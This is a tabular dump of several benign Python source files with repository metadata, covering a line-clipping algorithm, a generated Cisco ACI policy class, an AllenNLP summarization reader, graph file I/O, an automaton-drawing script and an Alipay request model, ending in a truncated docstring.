blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f3cd108c4ee31b5498859b931cd6bc67e4d4b418 | e91f477713556f14b288b89ecce89754d4bd93f7 | /alpha-clipping/main.py | 8206fd8738006ed2f687e69b36b9dbbd85e3e019 | [
"MIT"
] | permissive | PepSalehi/algorithms | 715603ad16c320c0f1d32c544062b71b11814263 | 1c20f57185e6324aa840ccff98e69764b4213131 | refs/heads/master | 2020-12-28T23:24:39.542742 | 2019-02-01T05:17:56 | 2019-02-01T05:17:56 | 14,173,271 | 0 | 0 | MIT | 2019-02-01T05:17:57 | 2013-11-06T13:27:34 | Python | UTF-8 | Python | false | false | 5,195 | py | #!/usr/bin/env python
"""Example of the alpha clipping algorithm."""
def main():
    """Run the clipping algorithm on a handful of hand-picked examples."""
    lower_left = Point(0.0, 0.0)
    upper_right = Point(10.0, 6.0)
    left_outside = Point(-3.0, 4.0)
    below_window = Point(6.0, -2.0)
    diagonal_out = Point(-1.0, -1.0)
    inside = Point(4.0, 4.0)
    far_above = Point(1.0, 100.0)
    clip_window = Rectangle(lower_left, upper_right)
    # Each pair of endpoints forms one test segment; cases are printed in
    # the same order they were originally listed.
    cases = [(below_window, upper_right),
             (diagonal_out, upper_right),
             (diagonal_out, inside),
             (below_window, diagonal_out),
             (diagonal_out, far_above),
             (left_outside, below_window)]
    for start, end in cases:
        print(alpha_clipping(clip_window, Line(start, end)))
class Point(object):
    """A 2D point with float coordinates ``x`` and ``y``.

    Supports addition, subtraction and left-multiplication by a float
    scalar, each returning a new ``Point``.
    """
    def __init__(self, x=0.0, y=0.0):
        """
        Create a point at (x, y).

        Parameters
        ----------
        x : float
        y : float
        """
        assert isinstance(x, float), "x=%r is not a float" % x
        assert isinstance(y, float), "y=%r is not a float" % y
        self.x = x
        self.y = y
    def __add__(self, other):
        sum_x = self.x + other.x
        sum_y = self.y + other.y
        return Point(sum_x, sum_y)
    def __sub__(self, other):
        diff_x = self.x - other.x
        diff_y = self.y - other.y
        return Point(diff_x, diff_y)
    def __rmul__(self, other):
        # Only scalar * Point is supported, and only with a float scalar.
        assert isinstance(other, float), "other=%r is not a float" % other
        return Point(other * self.x, other * self.y)
    def __str__(self):
        return "P(%0.2f, %0.2f)" % (self.x, self.y)
    def __repr__(self):
        return self.__str__()
class Rectangle(object):
    """An axis-aligned rectangle identified by two corner points."""
    def __init__(self, p1, p2):
        """
        Constructor for a rectangle.

        The corners may be given in any order; the axis-aligned bounds
        ``x_min``/``x_max`` and ``y_min``/``y_max`` are derived from them.

        Parameters
        ----------
        p1 : Point
        p2 : Point
        """
        assert isinstance(p1, Point), "p1=%r is not a point" % p1
        assert isinstance(p2, Point), "p2=%r is not a point" % p2
        self.p1 = p1
        self.p2 = p2
        self.x_min = min(p1.x, p2.x)
        # Bugfix: the y bounds were previously computed from p2.x instead of
        # p2.y, which made the window's vertical extent wrong.
        self.y_min = min(p1.y, p2.y)
        self.x_max = max(p1.x, p2.x)
        self.y_max = max(p1.y, p2.y)
    def get_outcode(self, p):
        """
        Get the outcode for a point p.

        The values are (left, right, bottom, top); each flag is True when
        the point lies outside the rectangle on that side.

        Parameters
        ----------
        p : Point

        Returns
        -------
        list of 4 bools
        """
        assert isinstance(p, Point), "p=%r is not a point" % p
        outcode = [p.x < self.x_min,
                   p.x > self.x_max,
                   p.y < self.y_min,
                   p.y > self.y_max]
        return outcode
    def get_wec(self, e, p):
        """
        Get the window edge coordinates (WEC) of a point p according to edge e.

        The WEC is the signed distance to edge ``e`` (0=left, 1=right,
        2=bottom, 3=top); it is negative exactly when ``p`` lies outside
        the rectangle with respect to that edge.

        Parameters
        ----------
        e : 0, 1, 2, 3
        p : Point

        Returns
        -------
        float
        """
        assert e in [0, 1, 2, 3], "e=%s is not in [0, 1, 2, 3]" % str(e)
        assert isinstance(p, Point), "p=%r is not a point" % p
        if e == 0:  # left
            return p.x - self.x_min
        elif e == 1:  # right
            return self.x_max - p.x
        elif e == 2:  # bottom
            return p.y - self.y_min
        elif e == 3:  # top
            return self.y_max - p.y
class Line(object):
    """A straight line segment between two points."""
    def __init__(self, p1, p2):
        """
        Create a line segment from ``p1`` to ``p2``.

        Parameters
        ----------
        p1 : Point
        p2 : Point
        """
        assert isinstance(p1, Point), "p1=%r is not a point" % p1
        assert isinstance(p2, Point), "p2=%r is not a point" % p2
        self.p1 = p1
        self.p2 = p2
    def __str__(self):
        return "[%s, %s]" % (str(self.p1), str(self.p2))
    # A line renders the same regardless of context.
    __repr__ = __str__
def alpha_clipping(rectangle, line):
    """
    Apply alpha-clipping of `line` according to `rectangle`.

    The segment is treated parametrically as P1 + a * (P2 - P1) with
    a in [0, 1]; each of the four window edges narrows the admissible
    interval [a_min, a_max] (Cyrus-Beck style parametric clipping).

    Parameters
    ----------
    rectangle : Rectangle
    line : Line

    Returns
    -------
    `None` or Line within rectangle
    """
    # Parameter interval of the segment that is still inside the window.
    a_min = 0.0
    a_max = 1.0
    outcode_p1 = rectangle.get_outcode(line.p1)
    outcode_p2 = rectangle.get_outcode(line.p2)
    for e in range(4):
        if outcode_p1[e] and outcode_p2[e]:
            return None  # trivial reject: both endpoints outside the same edge
        if outcode_p1[e] or outcode_p2[e]:
            # The segment crosses edge e: shrink the parameter interval.
            wec_p1 = rectangle.get_wec(e, line.p1)
            wec_p2 = rectangle.get_wec(e, line.p2)
            # wec_p1 and wec_p2 have opposite signs here, so the
            # denominator cannot be zero.
            a_s = wec_p1 / (wec_p1 - wec_p2)
            if outcode_p1[e]:  # P1 is outside of the rectangle
                a_min = max(a_min, a_s)
            else:
                a_max = min(a_max, a_s)
    if a_min > a_max:
        return None  # non-trivial reject: the interval collapsed
    else:
        # Now we have a line which is parametrized like this:
        # P1 + a * (P2 - P1) with a in [a_min, a_max]
        # We want a line which is parametrized like this:
        # P1' + a * (P2' - P1') with a in [0, 1]
        # Debug output of the final parameter interval.
        print("a_min=%0.2f" % a_min)
        print("a_max=%0.2f" % a_max)
        p1s = line.p1 + a_min * (line.p2 - line.p1)
        p2s = line.p1 + a_max * (line.p2 - line.p1)
        return Line(p1s, p2s)
# Entry point: run the demo only when executed directly (not on import).
if __name__ == '__main__':
    main()
| [
"info@martin-thoma.de"
] | info@martin-thoma.de |
bda61239f575bbe29c60da4f3ed441365a6650ae | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/ep/ipagingp.py | 24fe0ca702d011aa284b1fef708a92a52ea68b21 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 7,228 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class IpAgingP(Mo):
    """
    IP Aging Policy managed object (concrete MO class ``epIpAgingP``).

    Contained under ``cobra.model.infra.Infra`` and named by its ``name``
    property (RN format ``ipAgingP-%(name)s``).  NOTE: generated code --
    the metadata below mirrors the APIC model definition and is not meant
    to be edited by hand (see the file header).
    """
    # Class-level metadata: identity, containment and inheritance of this MO.
    meta = ClassMeta("cobra.model.ep.IpAgingP")
    meta.moClassName = "epIpAgingP"
    meta.rnFormat = "ipAgingP-%(name)s"
    meta.category = MoCategory.REGULAR
    meta.label = "IP Aging Policy"
    meta.writeAccessMask = 0x101000000001
    meta.readAccessMask = 0x101000000001
    meta.isDomainable = False
    meta.isReadOnly = False
    meta.isConfigurable = True
    meta.isDeletable = False
    meta.isContextRoot = False
    meta.childClasses.add("cobra.model.tag.Tag")
    meta.childClasses.add("cobra.model.fault.Delegate")
    meta.childClasses.add("cobra.model.aaa.RbacAnnotation")
    meta.childClasses.add("cobra.model.tag.Annotation")
    meta.childNamesAndRnPrefix.append(("cobra.model.tag.Annotation", "annotationKey-"))
    meta.childNamesAndRnPrefix.append(("cobra.model.aaa.RbacAnnotation", "rbacDom-"))
    meta.childNamesAndRnPrefix.append(("cobra.model.tag.Tag", "tagKey-"))
    meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
    meta.parentClasses.add("cobra.model.infra.Infra")
    meta.superClasses.add("cobra.model.fabric.ProtoPol")
    meta.superClasses.add("cobra.model.fabric.ProtoInstPol")
    meta.superClasses.add("cobra.model.naming.NamedObject")
    meta.superClasses.add("cobra.model.pol.Obj")
    meta.superClasses.add("cobra.model.pol.Def")
    meta.superClasses.add("cobra.model.fabric.L2InstPol")
    meta.rnPrefixes = [
        ('ipAgingP-', True),
    ]
    # Property metadata (generated PropMeta definitions follow).
    # adminSt: enables/disables IP aging; configurable, defaults to "disabled".
    prop = PropMeta("str", "adminSt", "adminSt", 27969, PropCategory.REGULAR)
    prop.label = "Admin State"
    prop.isConfig = True
    prop.isAdmin = True
    prop.defaultValue = 2
    prop.defaultValueStr = "disabled"
    prop._addConstant("disabled", "disabled", 2)
    prop._addConstant("enabled", "enabled", 1)
    meta.props.add("adminSt", prop)
    prop = PropMeta("str", "annotation", "annotation", 38574, PropCategory.REGULAR)
    prop.label = "Annotation. Suggested format orchestrator:value"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("annotation", prop)
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)
    prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)
    # dn/rn: implicit distinguished/relative name properties set by the SDK.
    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)
    prop = PropMeta("str", "extMngdBy", "extMngdBy", 40713, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "undefined"
    prop._addConstant("msc", "msc", 1)
    prop._addConstant("undefined", "undefined", 0)
    meta.props.add("extMngdBy", prop)
    prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "local"
    prop._addConstant("implicit", "implicit", 4)
    prop._addConstant("local", "local", 0)
    prop._addConstant("policy", "policy", 1)
    prop._addConstant("replica", "replica", 2)
    prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
    meta.props.add("lcOwn", prop)
    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)
    # name: the naming property used in the RN (create-only, 1-64 chars).
    prop = PropMeta("str", "name", "name", 27970, PropCategory.REGULAR)
    prop.label = "Name"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.isNaming = True
    prop.range = [(1, 64)]
    prop.regex = ['[a-zA-Z0-9_.:-]+']
    meta.props.add("name", prop)
    prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
    prop.label = "Name alias"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 63)]
    prop.regex = ['[a-zA-Z0-9_.-]+']
    meta.props.add("nameAlias", prop)
    prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerKey", prop)
    prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
    prop.label = "None"
    prop.isConfig = True
    prop.isAdmin = True
    prop.range = [(0, 64)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("ownerTag", prop)
    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)
    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)
    prop = PropMeta("str", "uid", "uid", 8, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("uid", prop)
    meta.namingProps.append(getattr(meta.props, "name"))
    # Deployment Meta
    meta.deploymentQuery = True
    meta.deploymentType = "Policy"
    def __init__(self, parentMoOrDn, name, markDirty=True, **creationProps):
        """Create the MO under ``parentMoOrDn``; ``name`` is its naming value."""
        namingVals = [name]
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
f4715eb58fdf816dd11aecfe15e38cb0f67c343e | f2ed44ff6a8e4f163680f53bd34845e3cac3d91c | /summarize/data/dataset_readers/sds/abstractive.py | 017d53831a96c5b3503813c07cadd9b1ba44f658 | [
"Apache-2.0"
] | permissive | CogComp/summary-cloze | 1a2b76ba2e19a8ca0a98e1b95e036dc1dfba17ad | b38e3e8c7755903477fd92a4cff27125cbf5553d | refs/heads/master | 2020-09-01T17:09:10.312107 | 2019-11-05T20:43:47 | 2019-11-05T20:43:47 | 219,012,685 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,880 | py | from allennlp.common.file_utils import cached_path
from allennlp.data import DatasetReader, Instance
from allennlp.data.fields import MetadataField, TextField
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer
from overrides import overrides
from typing import Dict, Iterable, List, Optional
from summarize.data.io import JsonlReader
from summarize.data.paragraph_tokenizers import ParagraphTokenizer, ParagraphWordTokenizer
@DatasetReader.register('sds-abstractive')
class AbstractiveDatasetReader(DatasetReader):
    """
    A ``DatasetReader`` for generic single-document abstractive summarization.

    Each input line is a JSON object holding a "document" field and a
    "summary" field, both lists of sentence strings (``List[str]``).

    Parameters
    ----------
    document_token_indexers: ``Dict[str, TokenIndexer]``, optional (default = ``{'tokens': SingleIdTokenIndexer()}``).
        The token indexers used for the document tokens.
    summary_token_indexers: ``Dict[str, TokenIndexer]``, optional.
        The token indexers used for the summary tokens. Defaults to the very
        same object as ``document_token_indexers``.
    document_tokenizer: ``ParagraphTokenizer``, optional (default = ``ParagraphWordTokenizer``).
        The tokenizer for the document text.
    summary_tokenizer: ``ParagraphTokenizer``, optional.
        The tokenizer for the summary text. Defaults to ``document_tokenizer``.
    max_document_length: ``int``, optional (default = ``None``).
        Maximum number of document tokens to keep; ``None`` disables
        truncation. The cut happens after tokenization, so the limit counts
        any ``start_tokens``/``end_tokens`` and may remove trailing ones.
    max_summary_length: ``int``, optional (default = ``None``).
        Maximum number of summary tokens to keep; see ``max_document_length``.
    """
    def __init__(self,
                 document_token_indexers: Optional[Dict[str, TokenIndexer]] = None,
                 summary_token_indexers: Optional[Dict[str, TokenIndexer]] = None,
                 document_tokenizer: Optional[ParagraphTokenizer] = None,
                 summary_tokenizer: Optional[ParagraphTokenizer] = None,
                 max_document_length: Optional[int] = None,
                 max_summary_length: Optional[int] = None,
                 lazy: bool = True) -> None:
        super().__init__(lazy)
        # Summary settings fall back to the corresponding document settings.
        self.document_token_indexers = document_token_indexers or {'tokens': SingleIdTokenIndexer()}
        self.summary_token_indexers = summary_token_indexers or self.document_token_indexers
        self.document_tokenizer = document_tokenizer or ParagraphWordTokenizer()
        self.summary_tokenizer = summary_tokenizer or self.document_tokenizer
        self.max_document_length = max_document_length
        self.max_summary_length = max_summary_length
    def _tokenize_and_clip(self, sentences: List[str],
                           tokenizer: ParagraphTokenizer,
                           max_length: Optional[int]):
        """Tokenize ``sentences`` and keep at most ``max_length`` tokens (if set)."""
        tokens = tokenizer.tokenize(sentences)
        return tokens if max_length is None else tokens[:max_length]
    @overrides
    def _read(self, file_path: str) -> Iterable[Instance]:
        file_path = cached_path(file_path)
        with JsonlReader(file_path) as f:
            for data in f:
                yield self.text_to_instance(data['document'], summary=data['summary'])
    @overrides
    def text_to_instance(self, document: List[str], summary: Optional[List[str]] = None) -> Instance:
        """
        Build an ``Instance`` from raw sentences.

        Parameters
        ----------
        document: ``List[str]``, required.
            The list of document sentences.
        summary: ``List[str]``, optional.
            The list of summary sentences.
        """
        document_tokens = self._tokenize_and_clip(document, self.document_tokenizer,
                                                  self.max_document_length)
        fields = {'document': TextField(document_tokens, self.document_token_indexers)}
        # The raw, untokenized sentences travel along as metadata.
        metadata = {'document': document}
        if summary is not None:
            summary_tokens = self._tokenize_and_clip(summary, self.summary_tokenizer,
                                                     self.max_summary_length)
            fields['summary'] = TextField(summary_tokens, self.summary_token_indexers)
            metadata['summary'] = summary
        fields['metadata'] = MetadataField(metadata)
        return Instance(fields)
| [
"danfdeutsch@gmail.com"
] | danfdeutsch@gmail.com |
2568d6aa8b661c8dae6a0f85ab197fa18cd31c95 | 7f66c9818b2a22e6dbfa832a6bb4f9f21fbd15da | /semester_2/graph/lab_03/main.py | 5147ef29678cf898ae10c2835d540e0b4f05cb83 | [] | no_license | caprapaul/assignments | cc3992833d4f23f74286c1800ac38dc2d9a874da | 206b049700d8a3e03b52e57960cd44f85c415fe8 | refs/heads/master | 2023-05-24T03:46:42.858147 | 2022-05-03T16:26:58 | 2022-05-03T16:26:58 | 248,552,522 | 0 | 0 | null | 2023-05-09T01:49:04 | 2020-03-19T16:31:37 | C | UTF-8 | Python | false | false | 1,744 | py | import random
from directed_graph import DirectedGraph
from ui import UI
from service import Service
def random_graph(graph, vertex_count, edge_count):
    """Populate ``graph`` with vertices 0..vertex_count-1 and ``edge_count``
    distinct random edges whose costs lie in [-10, 10).

    NOTE(review): if ``edge_count`` exceeds the number of distinct
    (source, target) pairs, this loop never terminates -- confirm that
    callers always pass a feasible count.
    """
    for vertex in range(vertex_count):
        graph.add_vertex(vertex)
    added = 0
    while added < edge_count:
        source = random.randrange(0, vertex_count)
        target = random.randrange(0, vertex_count)
        weight = random.randrange(-10, 10)
        # Only count the draw when the edge slot is still free.
        if graph.get_edge(source, target) is None:
            graph.add_edge(source, target, weight)
            added += 1
def load_from_file(graph, file_name: str):
    """Read a graph from ``file_name`` into ``graph``.

    Expected format: a header line "``<vertex_count> <edge_count>``"
    followed by one "``<start> <end> <cost>``" line per edge.
    """
    with open(file_name, 'r') as data_file:
        header = data_file.readline()
        vertex_count, edge_count = [int(part) for part in header.split(' ')]
        for vertex in range(vertex_count):
            graph.add_vertex(vertex)
        # Every remaining line describes one weighted edge.
        for row in data_file:
            start, end, cost = [int(part) for part in row.split(' ')]
            graph.add_edge(start, end, cost)
def save_to_file(graph: DirectedGraph, file_name: str):
    """Write ``graph`` to ``file_name`` in the same format that
    ``load_from_file`` reads: a "counts" header, then one line per edge."""
    with open(file_name, 'w') as data_file:
        lines = [f"{graph.vertices_count} {graph.edges_count}\n"]
        for edge in graph.parse_edges():
            lines.append(f"{edge.start} {edge.end} {edge.cost}\n")
        data_file.write("".join(lines))
def run():
    """Wire together the graph, service and UI, then persist the result."""
    graph = DirectedGraph()
    # Alternative seed data, kept disabled:
    #random_graph(graph, 100, 10)
    load_from_file(graph, "graph5.txt")
    service = Service(graph)
    ui = UI(graph, service)
    ui.run()
    # Save whatever state the UI session left behind.
    save_to_file(graph, "graph_out.txt")
# Executes immediately on import/run; there is no __main__ guard here.
run()
| [
"c.paulica@gmail.com"
] | c.paulica@gmail.com |
c9c8afe833e1dc94693f45f0a75d7f2677ea1bf0 | aa73e301f658b45a9674df4b619b288945dd0669 | /branches/sal4_new_test_framework/examples/lts2graph.py | a0436c68a964f4d2e7727d7f517de6f605cb99bb | [
"MIT"
] | permissive | svn2github/python-graph2 | e1c37f77cc0a27ac9099208876c63693bffbc929 | f19039d7f3fc1f04977c3f1d1d6128e8545ebef1 | refs/heads/master | 2020-04-30T04:11:38.475209 | 2013-04-19T01:06:14 | 2013-04-19T01:06:14 | 9,714,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,623 | py | #!/usr/bin/env python
# Copyright (c) Pedro Matiello <pmatiello@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
This small application will build and draw a graph for a given finite definite automaton described
as a labelled transition system.
This is a very naive, probably useless, possibly incorrect, barely tested implementation. No
validation is ever performed. Take care or it will burn your house and kill your cat.
"""
# Module metadata
__authors__ = "Pedro Matiello"
__license__ = "MIT"
# Imports
import sys
sys.path.append('..')
import pygraph
sys.path.append('/usr/lib/graphviz/python/')
sys.path.append('/usr/lib64/graphviz/python/')
import gv
def load_automaton(filename):
    """
    Read an automaton described as a labelled transition system and build
    the equivalent graph.

    Recognized record types (first token of each line): 'Q' states,
    'A' alphabet (ignored), 'F' final states, 's' initial state,
    't' transitions ("t <label> <from> <to>").

    @type filename: string
    @param filename: Name of the file containing the LTS-described automaton.
    @rtype: tuple (graph, list)
    @return: The automaton's graph and the list of final state names.
    """
    gr = pygraph.digraph()
    infile = file(filename,'r')
    line = infile.readline()
    final = []
    while (line):
        # Each line is "<datatype> <token> <token> ...".
        line = line.replace("\n",'').split(' ')
        datatype = line[0]
        data = line[1:]
        if (datatype == 'Q'):
            # States: one node per name.
            for each in data:
                gr.add_node(each)
        if (datatype == 'A'):
            # Alphabet: not needed for drawing.
            pass
        if (datatype == 'F'):
            # Final states: remembered for the double-circle styling below.
            final = final + data
        if (datatype == 's'):
            # Initial state: a point-shaped pseudo node '.' with an arrow in.
            gr.add_node('.',attrs=[('shape','point')])
            gr.add_edge('.',data[0])
        if (datatype == 't'):
            # Transitions: merge labels when the edge already exists.
            if (gr.has_edge(data[1], data[2])):
                gr.set_edge_label(data[1], data[2], \
                    gr.edge_label(data[1], data[2]) + ', ' + data[0])
            else:
                gr.add_edge(data[1], data[2], label=data[0])
        line = infile.readline()
    # Style every real node: double circle for final states, circle otherwise.
    for node in gr:
        if (node in final and node != '.'):
            gr.add_node_attribute(node, ('shape','doublecircle'))
        elif (node != '.'):
            gr.add_node_attribute(node, ('shape','circle'))
    return gr, final
# Main: read the LTS file named on the command line, build its graph,
# and serialize it to DOT.  (Python 2 script; `final` is unpacked but
# not used further here.)
try:
    filename = sys.argv[1]
    gr, final = load_automaton(sys.argv[1])
    dot = gr.write(fmt='dot')
except IndexError:
    print "Syntax: %s filename" % sys.argv[0]
    sys.exit(1)
except IOError:
    print "Can't open file %s" % filename
    sys.exit(2)
# Render the DOT description as a PNG image via Graphviz (circo layout).
gvv = gv.readstring(dot)
gv.layout(gvv,'circo')
gv.render(gvv,'png',filename + '.png')
| [
"salimfadhley@70df0079-b534-0410-988b-a5721c0f2d16"
] | salimfadhley@70df0079-b534-0410-988b-a5721c0f2d16 |
037de8db65e09ddb945a0032a8f52a6e11056bfc | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayOpenBpaasContractQueryModel.py | aafa6e6f87c71ca0f87f9405737db7a130bcbd87 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,452 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOpenBpaasContractQueryModel(object):
    """Request model carrying the ``bpaas_app_id`` and ``service_id``
    parameters, with dict (de)serialization in the generated-SDK style."""
    def __init__(self):
        self._bpaas_app_id = None
        self._service_id = None
    @property
    def bpaas_app_id(self):
        return self._bpaas_app_id
    @bpaas_app_id.setter
    def bpaas_app_id(self, value):
        self._bpaas_app_id = value
    @property
    def service_id(self):
        return self._service_id
    @service_id.setter
    def service_id(self, value):
        self._service_id = value
    def to_alipay_dict(self):
        """Serialize the set (truthy) fields into a plain dict; nested
        models are flattened through their own ``to_alipay_dict``."""
        params = dict()
        for key in ('bpaas_app_id', 'service_id'):
            value = getattr(self, key)
            if not value:
                continue  # falsy fields are omitted, matching the generated style
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[key] = value
        return params
    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a dict; a falsy input yields ``None``."""
        if not d:
            return None
        o = AlipayOpenBpaasContractQueryModel()
        for key in ('bpaas_app_id', 'service_id'):
            if key in d:
                setattr(o, key, d[key])
        return o
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
c4e8e69cf70a352f0113b54e9d57008ae864bf9b | 1d892928c70ee9ddf66f2a37a8e083d2632c6e38 | /smoketests/__init__.py | dbc926f1e38eba7021e4aac46cf302bf4a47fb84 | [
"Apache-2.0"
] | permissive | usc-isi/essex-baremetal-support | 74196c3f1332ee3cdeba9c263faff0ac0567d3cf | a77daf8ef56cf41e38de36621eda25ed3f180156 | refs/heads/master | 2021-05-19T03:12:11.929550 | 2020-07-24T14:15:26 | 2020-07-24T14:15:26 | 4,702,421 | 0 | 1 | Apache-2.0 | 2020-07-24T14:15:27 | 2012-06-18T15:19:41 | null | UTF-8 | Python | false | false | 1,262 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`smoketests` -- Nova Integration "Smoke" Tests
=====================================================
.. automodule:: nova.volume
:platform: Unix
